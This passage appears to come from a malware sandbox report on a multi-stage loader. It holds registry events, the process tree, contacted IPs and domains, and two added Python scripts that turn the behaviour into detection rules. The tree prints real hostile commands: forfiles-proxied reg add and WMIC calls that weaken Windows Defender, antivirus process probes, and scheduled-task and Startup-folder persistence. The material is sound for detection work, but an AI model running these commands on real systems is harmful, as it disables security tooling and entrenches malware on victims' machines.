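| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
"""

# Rule set: (ATT&CK technique, label, regex over the Indicator column).
# The technique IDs are the editor's mapping, not something the report states.
RULES = [
    ("T1497.001", "anti-vm: VirtualBox ACPI table", re.compile(r"\\ACPI\\DSDT\\VBOX__$", re.I)),
    ("T1497.001", "anti-vm: BIOS version probe", re.compile(r"\\(System|Video)BiosVersion$", re.I)),
    ("T1497.001", "anti-analysis: Wine detection", re.compile(r"\\Software\\Wine$", re.I)),
    ("T1547.001", "persistence: Run key", re.compile(r"\\CurrentVersion\\Run\\", re.I)),
    ("T1547.001", "persistence: Startup folder .url/.lnk", re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(url|lnk)$", re.I)),
    ("T1053.005", "persistence: scheduled task .job file", re.compile(r"^C:\\Windows\\Tasks\\[^\\]+\.job$", re.I)),
    ("T1553.004", "trust tampering: machine ROOT store write", re.compile(r"\\SystemCertificates\\ROOT\\Certificates\\[0-9A-F]{40}", re.I)),
]


@dataclass(frozen=True)
class Event:
    description: str
    indicator: str
    process: str
    target: str


def parse_rows(text):
    """Parse pipe-table rows into Events, skipping the header and non-row lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":
            continue
        events.append(Event(*cells))
    return events


def classify(events):
    """Yield (technique, label, process) for every rule that matches an event's indicator."""
    for ev in events:
        for technique, label, pattern in RULES:
            if pattern.search(ev.indicator):
                yield technique, label, ev.process


def summarize(text):
    """Group hits as {technique: {label: sorted processes}}; rows no rule matches are dropped."""
    out = {}
    for technique, label, process in classify(parse_rows(text)):
        out.setdefault(technique, {}).setdefault(label, set()).add(process)
    return {t: {lbl: sorted(p) for lbl, p in labels.items()} for t, labels in out.items()}


if __name__ == "__main__":
    for technique, labels in summarize(SAMPLE_ROWS).items():
        for label, procs in labels.items():
            print(f"{technique}  {label}")
            for p in procs:
                print(f"    {p}")
```

The rules key on the Indicator column only, so the same script works on rows from other detonations of the same family; add a rule per artifact you care about rather than matching on process names, which change between drops.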
Processes
| Process | Command line |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | "C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe" |
| C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
| C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe | "C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe" |
| C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe | "C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe" |
| C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | "C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe" |
| C:\Users\Admin\AppData\Local\Temp\svchost015.exe | C:\Users\Admin\AppData\Local\Temp\svchost015.exe |
| C:\Users\Admin\1000238002\Amadeus.exe | "C:\Users\Admin\1000238002\Amadeus.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe | "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe | "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe" |
| C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe |
| C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
| C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe | "C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe" |
| C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | "C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe" |
| C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe" |
| C:\Users\Admin\AppData\Local\Temp\service123.exe | "C:\Users\Admin\AppData\Local\Temp\service123.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f |
| C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | "C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe | "C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
| C:\Users\Admin\AppData\Roaming\NPqcpcuVNB.exe | "C:\Users\Admin\AppData\Roaming\NPqcpcuVNB.exe" |
| C:\Users\Admin\AppData\Roaming\tFtzeaz0BT.exe | "C:\Users\Admin\AppData\Roaming\tFtzeaz0BT.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | "C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe | "C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F |
| C:\Windows\system32\schtasks.exe | schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F |
| C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe" |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit |
| C:\Windows\SysWOW64\tasklist.exe | tasklist |
| C:\Windows\SysWOW64\findstr.exe | findstr /I "wrsa opssvc" |
| C:\Users\Admin\AppData\Local\Temp\filename.exe | "C:\Users\Admin\AppData\Local\Temp\filename.exe" |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /k move Investigations Investigations.bat & Investigations.bat & exit |
| C:\Windows\SysWOW64\tasklist.exe | tasklist |
| C:\Windows\SysWOW64\findstr.exe | findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" |
| C:\Windows\SysWOW64\cmd.exe | cmd /c md 684126 |
| C:\Windows\SysWOW64\findstr.exe | findstr /V "VegetablesIndividualBindingGba" Ever |
| C:\Windows\SysWOW64\cmd.exe | cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C |
| C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | Intake.pif C |
| C:\Windows\SysWOW64\choice.exe | choice /d y /t 5 |
| C:\Windows\SysWOW64\cmd.exe | cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F |
| C:\Windows\SysWOW64\cmd.exe | cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F |
| C:\Windows\SysWOW64\tasklist.exe | tasklist |
| C:\Windows\SysWOW64\findstr.exe | findstr /I "wrsa opssvc" |
| C:\Windows\SysWOW64\tasklist.exe | tasklist |
| C:\Windows\SysWOW64\findstr.exe | findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" |
| C:\Windows\SysWOW64\cmd.exe | cmd /c md 590819 |
| C:\Windows\SysWOW64\findstr.exe | findstr /V "MEDICAIDGROUPSSHARPGOVERNOR" Novels |
| C:\Windows\SysWOW64\cmd.exe | cmd /c copy /b ..\Sheet + ..\Drums + ..\Actually + ..\Mls + ..\Real + ..\Zoophilia + ..\Ah + ..\Opposed + ..\Affiliated y |
| C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | Associates.pif y |
| C:\Windows\SysWOW64\choice.exe | choice /d y /t 5 |
| C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe | "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zSA469.tmp\Install.exe | .\Install.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | .\Install.exe /PdidSen "385107" /S |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
"C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2836 -ip 2836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 492
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
"C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bDxiLwhXhHymEtvbIE" /SC once /ST 14:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe\" Jk /djdidPGu 385107 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe"
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
"C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1160
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
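The process tree above spells out the loader's evasion chain in plain cmd: tasklist piped into findstr for AV process names (wrsa, opssvc, avastui, bdservicehost, ...), copy /b stitching a .pif back together from harmless-looking fragments, forfiles used as a proxy so that reg add against Defender's ThreatIDDefaultAction policy key and gpupdate are launched by a signed system binary, WMIC adding an .exe exclusion through MSFT_MpPreference, and persistence via minute-interval scheduled tasks and a Startup-folder .url pointing at a wscript-run .js. As an added example, not part of the sandbox report, the Python below turns those observations into command-line heuristics and runs them over lines copied from the tree plus one constructed benign line; the rule labels are this example's own naming, not a vendor's.

```python
"""Flag the evasion/persistence patterns visible in the process tree above.

Added example (not part of the sandbox report). The rules mirror what the
report's own command lines show; the labels are this example's invention.
"""
import re

# Command lines copied from the report's process tree, plus one benign
# line constructed here as a negative control (the last entry).
SAMPLE_CMDLINES = [
    r'schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F',
    r'findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"',
    r'cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C',
    r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"',
    r'powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True',
    r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit',
    r"""schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F""",
    r'notepad.exe C:\Users\Admin\Documents\notes.txt',  # constructed benign control
]

# (label, pattern). Case-insensitive because cmd.exe switches are.
RULES = [
    ("defender_threat_action_override",
     re.compile(r'Windows Defender\\Threats\\ThreatIDDefaultAction', re.I)),
    ("defender_exclusion_via_wmic",
     re.compile(r'MSFT_MpPreference\b.*\bAdd\b.*Exclusion', re.I)),
    ("lolbin_forfiles_proxy_exec",            # forfiles /c "cmd ..." as a launcher
     re.compile(r'\bforfiles(\.exe)?\b.*\s/c\s+"?cmd\b', re.I)),
    ("schtasks_minute_persistence",           # /sc minute re-launches every N minutes
     re.compile(r'\bschtasks(\.exe)?\b.*/sc\s+minute', re.I)),
    ("schtasks_wscript_hidden",               # task body is wscript //B (no UI)
     re.compile(r'\bschtasks(\.exe)?\b.*wscript\s+//B', re.I)),
    ("startup_folder_url_shortcut",
     re.compile(r'\\Start Menu\\Programs\\Startup\\[^"]+\.url', re.I)),
    ("av_process_probe",                      # the findstr half of "tasklist | findstr"
     re.compile(r'\bfindstr\s+/I\s+"[^"]*\b(avastui|avgui|bdservicehost|nswscsvc|sophoshealth|wrsa|opssvc)\b', re.I)),
    ("binary_fragment_reassembly",            # copy /b a + b + c ... out
     re.compile(r'\bcopy\s+/b\s+\S+(\s*\+\s*\S+){2,}', re.I)),
]


def classify(cmdline):
    """Return the sorted list of rule labels that match one command line."""
    return sorted(label for label, rx in RULES if rx.search(cmdline))


def scan(cmdlines):
    """Return {cmdline: [labels]} for every line that matched at least one rule."""
    hits = {}
    for line in cmdlines:
        labels = classify(line)
        if labels:
            hits[line] = labels
    return hits


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_CMDLINES).items():
        print(", ".join(labels), "<-", line[:90])
```

The forfiles and WMIC rules are the ones worth wiring into real telemetry: neither binary has a legitimate reason to launch reg.exe against Defender policy keys or to call MSFT_MpPreference from a user's Temp-dropped process, so they can alert on a single event rather than on a chain.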
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| RU | 185.215.113.117:80 | 185.215.113.117 | tcp |
| US | 8.8.8.8:53 | 117.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| DE | 95.179.250.45:26212 | | tcp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| US | 8.8.8.8:53 | 45.250.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.113.215.185.in-addr.arpa | udp |
| FI | 65.21.18.51:45580 | | tcp |
| US | 8.8.8.8:53 | 51.18.21.65.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| FI | 95.216.107.53:12311 | | tcp |
| US | 8.8.8.8:53 | 17.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.107.216.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| US | 8.8.8.8:53 | fivev5sb.top | udp |
| RU | 195.133.48.136:80 | fivev5sb.top | tcp |
| US | 8.8.8.8:53 | 136.48.133.195.in-addr.arpa | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | 19.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | | tcp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| FI | 95.216.143.20:12695 | | tcp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.143.216.95.in-addr.arpa | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 104.21.84.66:443 | millyscroqwp.shop | tcp |
| US | 8.8.8.8:53 | 66.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 104.21.10.172:443 | condedqpwqm.shop | tcp |
| TM | 91.202.233.158:80 | 91.202.233.158 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 172.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.233.202.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| FI | 65.21.18.51:45580 | | tcp |
| FI | 95.216.107.53:12311 | | tcp |
| US | 8.8.8.8:53 | softonic-pc.ru | udp |
| RU | 37.140.192.11:443 | softonic-pc.ru | tcp |
| US | 8.8.8.8:53 | 11.192.140.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 104.21.84.66:443 | millyscroqwp.shop | tcp |
| US | 8.8.8.8:53 | 240902175059845.std.kqve01.top | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 104.21.10.172:443 | condedqpwqm.shop | tcp |
| CH | 179.43.188.227:80 | 240902175059845.std.kqve01.top | tcp |
| NL | 45.200.149.147:80 | 45.200.149.147 | tcp |
| US | 8.8.8.8:53 | 227.188.43.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.149.200.45.in-addr.arpa | udp |
| RU | 194.58.114.223:80 | 194.58.114.223 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 223.114.58.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN | udp |
| US | 8.8.8.8:53 | DGLQIQwMnon.DGLQIQwMnon | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
